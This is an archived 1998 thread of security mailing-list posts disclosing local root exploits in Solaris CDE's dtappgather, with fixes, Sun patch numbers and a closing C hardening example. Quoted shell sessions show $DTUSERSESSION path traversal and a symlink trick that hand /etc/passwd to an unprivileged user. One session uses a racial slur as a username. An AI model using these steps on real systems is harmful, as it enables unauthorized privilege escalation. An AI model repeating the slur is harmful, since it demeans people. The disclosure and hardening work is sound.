[ http://www.rootshell.com/ ]
From [email protected] Mon Nov 2 08:12:39 1998
Date: Mon, 2 Nov 1998 18:05:59 +0100 (MET)
From: Andrea Costantino <[email protected]>
To: [email protected], [email protected]
Subject: another /usr/dt/bin/dtappgather feature!
Attached is the message related to this new feature.
the /usr/dt/bin/dtappgather program tries to read the environment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a symbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately the dtappgather never checks the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....
For example
costan@penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appmanager
costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan@penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan@penelope$ ls -al /etc/passwd
-r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd
This way you're satisfied even without making strange links on strange paths
(the names in CDE are very difficult to remember ;-) )
Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano
Attached message:
Date: Mon, 23 Feb 1998 15:31:16 +0200
From: Mastoras <[email protected]>
Subject: /usr/dt/bin/dtappgather exploit
Buggy program:
/usr/dt/bin/dtappgather
Description of the problem:
Local users can change the ownership of any file, thus gaining
root privileges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.
Systems Affected:
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if it exists owned by another user.
Quick Fix:
chmod -s /usr/dt/bin/dtappgather
The Exploit:
The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".
Hack wisely,
Mastoras
/*
* Computer Engineering & Informatics Department, Patras, Greece
* Mastor Wins, Fatality! http://www.hack.gr/users/mastoras
*/
---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <[email protected]>
Reply-To: [email protected]
To: [email protected], Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit
Hello,
I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:
nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root
it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shitty ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
I hope this was not too lame or well-known :-)
Seeya,
mastoras
--------------------------------------------------------------------------
Steven Goldberg - SE - Seattle WA ([email protected])
Hi,
Sun has published the following patches to address this
vulnerability:
patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch
thanks,
Steve
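The two defects described in this thread, an environment-supplied session name used as a relative path and a chown() applied to a path name that may be a symbolic link, share one hardening pattern: accept the name only as a single path component, open it relative to the application directory with O_NOFOLLOW, inspect the open descriptor with fstat(), and fchown() that same descriptor. The C program below is an added example and is not code from CDE, Sun, or any of the posters; the function names, the 64-character bound, and the scratch directory under /tmp are constructed for the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Accept only a single plain path component. A session name such as
 * "../../../../etc/passwd" must never reach the filesystem. */
int validate_session_name(const char *name)
{
    if (name == NULL || *name == '\0' || strlen(name) > 64)   /* 64: arbitrary bound (assumption) */
        return -1;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0 || strchr(name, '/') != NULL)
        return -1;
    return 0;
}

/* Change ownership of dir/name only if the entry is reached without following a
 * symlink and is a regular file with a single link. The checks and the fchown()
 * act on the same open descriptor, so the object inspected is the object changed.
 * Returns 0 on success, -1 with errno set: EINVAL for a rejected name, ELOOP when
 * the entry is a symbolic link, EPERM for any other object type. */
int safe_chown_in_dir(const char *dir, const char *name, uid_t uid, gid_t gid)
{
    struct stat st;
    int dirfd, fd, rc = -1, saved;

    if (validate_session_name(name) != 0) {
        errno = EINVAL;
        return -1;
    }
    dirfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0)
        return -1;
    fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    saved = errno;
    close(dirfd);
    if (fd < 0) {
        errno = saved;            /* ELOOP if the entry was a symbolic link */
        return -1;
    }
    if (fstat(fd, &st) == 0) {
        if (S_ISREG(st.st_mode) && st.st_nlink == 1)
            rc = fchown(fd, uid, gid);
        else
            errno = EPERM;
    }
    saved = errno;
    close(fd);
    errno = saved;
    return rc;
}

/* Demonstration on constructed data: a scratch directory holding a regular file
 * and a symlink pointing at it. Returns 0 when the regular file is chowned to the
 * caller, the symlink is refused with ELOOP, and a traversal-style name is refused
 * with EINVAL. */
int run_demo(void)
{
    char tmpl[] = "/tmp/appmgr-demo-XXXXXX";
    char file[128], lnk[128];
    char *dir = mkdtemp(tmpl);
    int fd, result = 1;

    if (dir == NULL)
        return -1;
    snprintf(file, sizeof file, "%s/generic-display-0", dir);
    snprintf(lnk, sizeof lnk, "%s/session-link", dir);
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd >= 0) {
        close(fd);
        if (symlink(file, lnk) == 0) {
            int ok_regular = safe_chown_in_dir(dir, "generic-display-0", getuid(), getgid()) == 0;
            int ok_symlink = safe_chown_in_dir(dir, "session-link", getuid(), getgid()) == -1
                             && errno == ELOOP;
            int ok_name = safe_chown_in_dir(dir, "../../../../etc/passwd", getuid(), getgid()) == -1
                          && errno == EINVAL;
            result = (ok_regular && ok_symlink && ok_name) ? 0 : 1;
            unlink(lnk);
        }
        unlink(file);
    }
    rmdir(dir);
    return result;
}
```

The truss output quoted above shows the pre-patch sequence as chown() followed by chmod(), both given a path name; whatever that name resolves to at the instant of each call is what gets changed. Operating on a descriptor obtained with O_NOFOLLOW closes that window, and rejecting anything other than a single component closes the traversal through $DTUSERSESSION. The directory mode change Sun made for Solaris 2.6 addresses only the first defect, which is why the second report still worked there.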